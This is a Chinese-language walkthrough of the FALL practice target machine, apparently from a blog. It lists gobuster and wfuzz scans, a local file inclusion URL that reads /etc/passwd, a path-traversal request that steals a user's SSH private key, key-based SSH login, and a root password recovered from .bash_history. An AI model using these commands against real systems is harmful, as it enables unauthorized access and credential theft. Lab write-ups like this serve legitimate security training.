FALL靶机渗透攻略

1.安装并开启靶机

2.获取靶机IP

将靶机和Kali都设置为NAT模式

3.访问靶机地址

4.扫描目录和端口

gobuster dir -u http://192.168.40.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

5.访问敏感文件

提示缺少GET参数

爆破参数

wfuzz -u "http://192.168.40.147/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80

尝试读取passwd文件:http://192.168.40.147/test.php?file=/etc/passwd

尝试包含/home/qiu目录下默认保存的ssh密钥文件,通过前面扫描端口知道开了ssh,

我们需要知道ssh默认存私钥的目录:/home/user/.ssh/id_rsa

http://192.168.40.147/test.php?file=../../../../../../../../../home/qiu/.ssh/id_rsa

将私钥保存到Kali中,用私钥登录

chmod 400 id_rsa

ssh qiu@192.168.40.147 -i id_rsa

6.提权

查看用户qiu家目录下的.bash_history文件,找到密码:remarkablyawesomE

sudo su

相关推荐
迎風吹頭髮8 分钟前
UNIX下C语言编程与实践58-UNIX TCP 连接处理:accept 函数与新套接字创建
c语言·网络·unix
毕设源码-郭学长3 小时前
【开题答辩全过程】以 安全培训信息管理平台为例,包含答辩的问题和答案
安全
猫头虎5 小时前
如何查看局域网内IP冲突问题?如何查看局域网IP环绕问题?arp -a命令如何使用?
网络·python·网络协议·tcp/ip·开源·pandas·pip
jieyu11195 小时前
网络、主机安全扫描工具
linux·安全·系统安全
FIN66686 小时前
昂瑞微冲刺科创板:创新驱动,引领射频芯片国产化新征程
前端·安全·前端框架·信息与通信·芯片
hello_2507 小时前
动手模拟docker网络-bridge模式
网络·docker·桥接模式
武文斌778 小时前
项目学习总结:LVGL图形参数动态变化、开发板的GDB调试、sqlite3移植、MQTT协议、心跳包
linux·开发语言·网络·arm开发·数据库·嵌入式硬件·学习
爱吃喵的鲤鱼8 小时前
仿mudou——Connection模块(连接管理)
linux·运维·服务器·开发语言·网络·c++
爱吃小胖橘8 小时前
Unity网络开发--超文本传输协议Http(1)
开发语言·网络·网络协议·http·c#·游戏引擎
萧鼎8 小时前
Python schedule 库全解析:从任务调度到自动化执行的完整指南
网络·python·自动化